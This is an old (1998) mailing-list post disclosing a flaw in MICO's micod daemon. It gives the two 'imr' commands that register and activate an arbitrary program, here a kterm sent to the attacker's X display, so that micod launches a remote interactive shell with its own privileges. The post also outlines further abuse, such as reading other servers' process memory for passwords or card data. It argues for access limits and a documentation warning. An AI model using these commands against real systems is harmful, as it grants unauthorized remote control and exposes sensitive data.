After having installed MICO (a free CORBA-ORB for C++) I installed the
'micod' (a daemon which is e.g. able to create objects on request).
I put it in my boot-up scripts, so it ran as root, but this exploit will
work too, if it is started as another user.
After thinking for a moment I tried this (as guest, but could be a user
on another system too):
(micod ist started on inet:winkelklinke.local:8888)
(hacking from enfin.local, which has X on display :0)
imr -ORBImplRepoAddr inet:winkelklinke.local:8888 create Play shared
"kterm -display enfin.local:0 & echo" IDL:Anything:1.0
imr -ORBImplRepoAddr inet:winkelklinke.local:8888 activate Play
kterm will start as child of micod and connect to enfin.local:0.
(any other program should work too, but xterm didn't start correctly, I
don't know why)
The 'echo' after the '&' is needed to absorb the arguments micod add to
the command-line.
Now you can do everything.
Don't underestimate the problem if micod is not installed root:
1. You can login, it's as good as a pwd-free guest account.
2. You may control other servers started by micod or see their
process-memory (e.g. under Linux with /proc, but their may be other ways
on other systems), which may contain sensitive data as access password,
credit card information or whatever, depending of your application.
I think, there should be some kind of access limitation when writing
into the Implemetation Repository (the information managed by micod).
And there should be a visible warning in the documentation.
DniQ.
PS: Hallo Nahne!
Received on May 10 1998
Intro
